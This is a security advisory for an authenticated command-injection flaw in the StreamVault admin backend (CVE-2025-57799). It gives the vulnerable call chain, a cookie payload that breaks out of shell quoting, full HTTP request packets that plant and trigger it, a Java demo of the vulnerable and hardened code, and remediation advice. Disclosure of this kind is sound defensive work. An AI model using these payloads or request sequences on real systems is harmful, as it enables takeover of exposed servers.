StreamVault system RCE vulnerability (authenticated command injection).

Summary

  • After logging into the StreamVault backend, an attacker can modify certain configuration parameters (such as the cookies stored for the various video platforms), embed shell commands in them, trigger a command injection against the system, and ultimately obtain the privileges of the account running the server.

Details

  • The StreamVault backend assembles user-supplied data into shell command strings. Some of this data is passed, without sanitization, down the call chain CommandUtil.f2cmd -> CommandUtil.commandos(cmd.toString()) -> new ProcessBuilder("/bin/sh", "-c", command). Because the assembled string is handed to /bin/sh -c, any shell metacharacters in the user data are interpreted by the shell.
  • Take the Douyin Cookie configuration item in the Douyin/Kuaishou configuration module as an example.

[Screenshots omitted]

  • The screenshots show the cookie being concatenated directly into the command line that runs a Python script, as a double-quoted argument (which is what the shape of the working payload implies). A cookie value of the form "; [command]; echo " therefore closes the open quote, terminates the intended command with `;`, runs the attacker's command, and uses `echo "` to re-open a quote so that the trailing quote of the original command line still parses. Arbitrary commands can be executed this way.
  • For example: "; touch /tmp/aaabbb222; echo "

[Screenshot omitted]

  • Then call the endpoint that consumes that cookie (the loadDouFav request in the data packets below).

[Screenshot omitted]

  • After 1 to 2 minutes the injected command runs.

[Screenshot omitted]

Remediation Recommendations

  • The vulnerability point above is only one example. There are other places in the system where command strings are built by concatenation and then executed; fix those as well.
    • Pass arguments as a list (ProcessBuilder(List<String>) or ProcessBuilder(String...)) instead of building one string for /bin/sh -c. With no shell involved, metacharacters in the data are never interpreted.
    • Avoid spawning system commands at all where possible; use built-in language functions or a library instead.
    • Validate input (not the primary fix, since validation can be bypassed; note that real cookie strings legitimately contain ';' and spaces, so a blocklist of shell metacharacters is hard to get right without breaking the feature).
    • Escape special characters only as a last resort, and only with a quoting routine written for the specific shell in use.
    • Run any remaining external commands in a restricted environment (a separate low-privilege user, container, or sandbox) so that injection does not yield server privileges.
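The following is an added example, not StreamVault's own code, covering both the call chain in the Details section and the first remediation item above. It places a stand-in for the vulnerable f2cmd -> commandos -> ProcessBuilder("/bin/sh", "-c", ...) shape next to a hardened argument-list version, and runs the page's payload through both. Assumptions: `echo` stands in for the Python script the real system runs, the cookie is wrapped in double quotes as the payload shape implies, the file is created with `touch` in the original but here `echo INJECTED` is used so the demo leaves nothing on disk, and the regex check is one possible defence-in-depth filter, not the project's. It needs /bin/sh, so it runs on Linux or macOS.

```java
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Pattern;

public class CookieCommandDemo {

    // Constructed input, derived from the PoC payload on this page with `touch`
    // replaced by `echo` so the demo leaves nothing on disk.
    static final String PAYLOAD = "\"; echo INJECTED; echo \"";

    // Constructed input: a benign cookie string. Real cookie headers contain ';'
    // and spaces, so a filter that simply rejects ';' would break the feature.
    static final String BENIGN_COOKIE = "sessionid=abc123; ttwid=xyz";

    /**
     * Vulnerable shape (assumed stand-in for CommandUtil.f2cmd -> commandos):
     * the cookie is concatenated into one string that /bin/sh -c then parses.
     * "echo" stands in for the Python script the real system runs (assumption).
     */
    static String vulnerableRun(String cookie) throws IOException, InterruptedException {
        String cmd = "echo --cookie \"" + cookie + "\"";
        return run(new ProcessBuilder("/bin/sh", "-c", cmd));
    }

    /**
     * Hardened shape: no shell. Each argument is its own argv element, so the
     * cookie reaches the child process verbatim and ';' or '"' are just bytes.
     */
    static String hardenedRun(String cookie) throws IOException, InterruptedException {
        List<String> argv = new ArrayList<>();
        argv.add("echo");       // would be "python3", "/path/to/script.py" in the real system (assumption)
        argv.add("--cookie");
        argv.add(cookie);       // passed verbatim, never parsed by a shell
        return run(new ProcessBuilder(argv));
    }

    // Defence in depth only (hypothetical filter): printable ASCII, excluding the
    // quoting and expansion characters. ';' is deliberately allowed because cookie
    // strings need it; the argv-list fix above is what actually closes the bug.
    private static final Pattern COOKIE_OK = Pattern.compile("[\\x20-\\x7e&&[^\"'`$\\\\]]*");

    static boolean looksLikeCookie(String cookie) {
        return COOKIE_OK.matcher(cookie).matches();
    }

    private static String run(ProcessBuilder pb) throws IOException, InterruptedException {
        pb.redirectErrorStream(true);
        Process p = pb.start();
        byte[] out = p.getInputStream().readAllBytes();
        p.waitFor();
        return new String(out, StandardCharsets.UTF_8);
    }

    public static void main(String[] args) throws Exception {
        System.out.print("vulnerable:\n" + vulnerableRun(PAYLOAD));
        System.out.print("hardened:\n" + hardenedRun(PAYLOAD));
        System.out.println("benign cookie accepted: " + looksLikeCookie(BENIGN_COOKIE));
        System.out.println("payload accepted: " + looksLikeCookie(PAYLOAD));
    }
}
```

Compile and run with `javac CookieCommandDemo.java && java CookieCommandDemo`. In the vulnerable branch the shell sees `echo --cookie ""; echo INJECTED; echo ""` and prints INJECTED on its own line, i.e. the injected command ran; in the hardened branch `echo` receives the payload as a single literal argument and prints it back unchanged. The regex accepts the benign cookie (it contains `;` and spaces) and rejects the payload because of the double quotes, which shows why a blocklist has to be tuned to the data format and why it is only a secondary control.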

PoC

"; touch /tmp/success; echo "

Data packet

POST /admin/api/updateTikTokConfig HTTP/1.1
Host: 192.168.31.18:28083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 54
Origin: http://192.168.31.18:28083
Sec-GPC: 1
Connection: close
Referer: http://192.168.31.18:28083/admin/config
Cookie: JSESSIONID=0A94699072E4BC00877626D9C0A13837
Priority: u=0

id=1&cookies=%22%3B+touch+%2Ftmp%2Fsuccess%3B+echo+%22

GET /admin/api/loadDouFav?uid=1 HTTP/1.1
Host: 192.168.31.18:28083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Origin: http://192.168.31.18:28083
Sec-GPC: 1
Connection: close
Referer: http://192.168.31.18:28083/admin/config
Cookie: JSESSIONID=0A94699072E4BC00877626D9C0A13837

Impact

  • All versions of the StreamVault system to date are affected. Exploitation requires a logged-in backend session, so deployments whose backend password has not been changed from the default, or that use a weak password, can be taken over through remote command execution by anyone who can reach the admin interface.

CVE

  • CVE-2025-57799